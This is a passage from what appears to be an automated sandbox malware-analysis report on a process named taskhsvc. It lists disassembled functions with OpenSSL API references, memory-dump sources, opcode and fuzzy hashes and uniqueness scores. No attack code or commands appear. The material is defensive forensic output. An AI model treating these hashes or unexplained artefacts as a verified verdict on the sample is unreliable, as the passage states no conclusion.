                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: h$y
                                                            • API String ID: 1767461275-1639214004
                                                            • Opcode ID: 11b65395c7335dfff60121303be8dbc90e0be2e78badeaa3f50a17e3ede3b145
                                                            • Instruction ID: aea6fe0ff365d68aa14125bab02c62f87fed8839961523bc8c08f1196ef68f72
                                                            • Opcode Fuzzy Hash: 11b65395c7335dfff60121303be8dbc90e0be2e78badeaa3f50a17e3ede3b145
                                                            • Instruction Fuzzy Hash: 82F03A702097419FD700DFA5C64460BBBF4EB86358F228A0CE9A44B750C3B5E90A8B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC4DC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: n$y
                                                            • API String ID: 1767461275-1698240262
                                                            • Opcode ID: 8c0e2fc10c5c7e75c0df8320f61bcc0fa3b376fe0b38d0ce1a57f7f841ef6e72
                                                            • Instruction ID: 1fa0434a63c891b438ce03b4afc08414f438e3255c05083af5def34204f7a04d
                                                            • Opcode Fuzzy Hash: 8c0e2fc10c5c7e75c0df8320f61bcc0fa3b376fe0b38d0ce1a57f7f841ef6e72
                                                            • Instruction Fuzzy Hash: E2F058716083408FE700CF65C644A5BBBF0AB86318F22CA0CE6B44B740C3B5E9068B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE26D6C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sk_num.LIBEAY32 ref: 6CE26CCC
                                                            • sk_new_null.LIBEAY32 ref: 6CE26D70
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FD6
                                                              • Part of subcall function 6CED2FB0: CRYPTO_malloc.LIBEAY32 ref: 6CED2FFC
                                                            • ERR_put_error.LIBEAY32 ref: 6CE26DA7
                                                              • Part of subcall function 6CEDA930: ERR_get_state.LIBEAY32 ref: 6CEDA95E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE26DB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$R_get_stateR_put_error__stack_chk_failsk_new_nullsk_num
                                                            • String ID: A$f
                                                            • API String ID: 344941655-3676314414
                                                            • Opcode ID: 0f4dc17cd55a07e584b63bcb68218d73d9ae3316a9b77139f7e24d5e6c623dab
                                                            • Instruction ID: 8afda5c08766e5b273f802de0d91f7a2b1bbe36fab2f543ae3ee031cb40d8a37
                                                            • Opcode Fuzzy Hash: 0f4dc17cd55a07e584b63bcb68218d73d9ae3316a9b77139f7e24d5e6c623dab
                                                            • Instruction Fuzzy Hash: 47E012B21083419FD7009F55E50538BB7F4FF8035CF25CA1DE5988AB54D37AD5498B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC0F50 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4398d6389f18c726b096a9a6a77801851deeb6fab0ffddd7c801cf683c794cd7
                                                            • Instruction ID: 4820449c6730761cf81dac315299c1c4eee369c398f52b8584191d3f7f35cdd5
                                                            • Opcode Fuzzy Hash: 4398d6389f18c726b096a9a6a77801851deeb6fab0ffddd7c801cf683c794cd7
                                                            • Instruction Fuzzy Hash: C24113B16097419FD700DF25C68174BBBF0AB88358F11891DE9A8AB710D371E945CF93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEEAEE0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 5953d3edc09481f788f4a21d02c1969f406a3a0db228dbee9c12f051bab3faae
                                                            • Instruction ID: 833c12ca2d5094eea5d46f0a28fbb2789c86df913d04cf970cf90ce38c94bddf
                                                            • Opcode Fuzzy Hash: 5953d3edc09481f788f4a21d02c1969f406a3a0db228dbee9c12f051bab3faae
                                                            • Instruction Fuzzy Hash: 2F21F875A486018FCB14DF29C28194AF7F1FB8D318F56CA5DEA989B700D334AA05CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEEAFE0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 7a9dd887f5785c183fd0325c53ebd3f83d8622be83bc55451c4fb2d8b0c41634
                                                            • Instruction ID: a77193c42c507170c21dd0921cc5ec46177d0f80f9c901c33890ab588cf611c5
                                                            • Opcode Fuzzy Hash: 7a9dd887f5785c183fd0325c53ebd3f83d8622be83bc55451c4fb2d8b0c41634
                                                            • Instruction Fuzzy Hash: 3521C935A087018FCB14DF29C18054AF7F1FB8D318F568A5DEAA85B701D735BA058F9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF045A0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16fd03789051cf311a2eeb0257fdeec4e03ade535cdd0b90a652f111fcf45e21
                                                            • Instruction ID: 1a7afe01a3857fdb305f871e7e239e591e313a67553960ee0f17ea4810c675b4
                                                            • Opcode Fuzzy Hash: 16fd03789051cf311a2eeb0257fdeec4e03ade535cdd0b90a652f111fcf45e21
                                                            • Instruction Fuzzy Hash: 0E216D756047018FDB00DF25C59095BBBF4BF5A718F068A5CEAA49BB40D730E901CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF34DA0 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_i2d_$__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 1073482418-0
                                                            • Opcode ID: 13e44c73c5a22ced0e042607bd41113a5e3c28ed3e266db15f3ea987db6b1014
                                                            • Instruction ID: f9b709068fab9abe9486d66ca27640dcaf76cf19a2b7efa00c0831fd75ff5cfc
                                                            • Opcode Fuzzy Hash: 13e44c73c5a22ced0e042607bd41113a5e3c28ed3e266db15f3ea987db6b1014
                                                            • Instruction Fuzzy Hash: 401126702097109FDB14DF29D580A4BBBF1AF89718F05D95CE8998BB94E331E8408B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3A6C0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CRYPTO_get_ex_new_index.LIBEAY32 ref: 6CF3A6FD
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF3A712
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
